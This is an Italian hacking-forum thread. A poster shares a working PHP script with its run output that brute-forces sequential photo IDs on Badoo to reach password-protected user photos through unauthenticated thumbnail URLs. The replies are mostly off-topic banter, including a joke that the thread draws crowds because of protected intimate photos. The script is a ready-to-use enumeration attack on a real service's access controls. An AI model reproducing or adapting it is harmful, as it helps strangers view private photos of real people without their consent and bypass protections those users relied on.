_192 thumb media (192 altezza)
_920 formato normale.
neanche a _192 serve autenticazione!
http://eu1.badoo.com/0113919383/p258937
http://p1.badoo.com/160/5/6/1/113919383/258935/258937_48.jpg
http://p1.badoo.com/160/5/6/1/113919383/258935/258937_96.jpg
http://p1.badoo.com/160/5/6/1/113919383/258935/258937_192.jpg
http://p1.badoo.com/160/5/6/1/113919383/258935/258937_920.jpg <- quà serve l'hash cc=...

spero di far cosa gradita...

define('DEBUG', TRUE);
function iflush() { flush(); ob_flush(); }
function iecho($str) { echo $str; iflush(); }
function idebug($str) { if (DEBUG) echo $str; iflush(); }

/* conf */
$base = 'http://p16.badoo.com/160/5/6/1/113919383/258935/';
$try = 10;
/* **** */

ob_start();
ob_implicit_flush();
$http = new CurlTool();
preg_match_all('/http:\/\/(.*?)\/(.*?)\/(.*?)\/(.*?)\/(.*?)\/(.*?)\/(.*?)\//',$base,$matches);
$first = $matches[7][0] + 1;
iecho("Starting bruteforce on $base (try for $try time) ...\n\n");
for ($i=$first;$i<=$first+$try;$i++) {
  $buff = $http->fetchContent($base.$i.'_192.jpg');
  if (substr($buff,0,3) == 'GIF')
    idebug("$i not found :( \n");
  else 
    iecho("<a href='".$base.$i."_192.jpg'>$i</a> found :) \n");
}

Starting bruteforce on http://p16.badoo.com/160/5/6/1/113919383/258935/ (try for 10 time) ...

258936 not found :( 
258937 found :) 
258938 not found :( 
258939 not found :( 
258940 not found :( 
258941 not found :( 
258942 not found :( 
258943 not found :( 
258944 not found :( 
258945 not found :( 
258946 not found :(

http://p16.badoo.com/160/5/6/1/113919383/258935/258937_192.jpg

 

[keyer]

salve a tutti...
siete dei grandi
speriamo si riesca a trovare un nuovo metodo...
sinceramente l'ultimo post nn sono riuscito a metterlo in pratica xkè nn l'ho capito...se riesci a spiegarmelo in modo più semplice provo.
grazie e buon lavoro a tutti

 

[Robertof]

1. Presentati
2. Lo sappiamo
3. Niente pappa pronta.

 

[nemnem]

1. Presentati
2. Lo sappiamo
3. Niente pappa pronta.

Grande..hai proprio ragione, come ho già scritto da qualche altra parte:

La pappa pronta si trova UNA volta sola!!!

Buon lavoro a tutti..

 

[Robertof]

Nemnem ti dovresti presentare anche tu..

 

[MrDarkest]

Emh... Basta con gli OT ok?

 

[nemnem]

Nemnem ti dovresti presentare anche tu..

Ancora!! Va bè: Anche se non è la sezione giusta mi presento:

Molto piacere, NEMNEM

 

[Robertof]

Siamo molto off topic..
Su finiamola qui, e comunque l'hai detto stesso tu che non è la sezione adatta...

 

[interrupt]

[ot]Avete notato quanta gente attira questa discussione?
E' proprio vero che tira più un "pelo di foga su foto protetta da password su badoo" che un carro di buoi [/ot]

 

[MasteR_]

[ot] se vi piace i reale, vai con ciao amigos [/ot]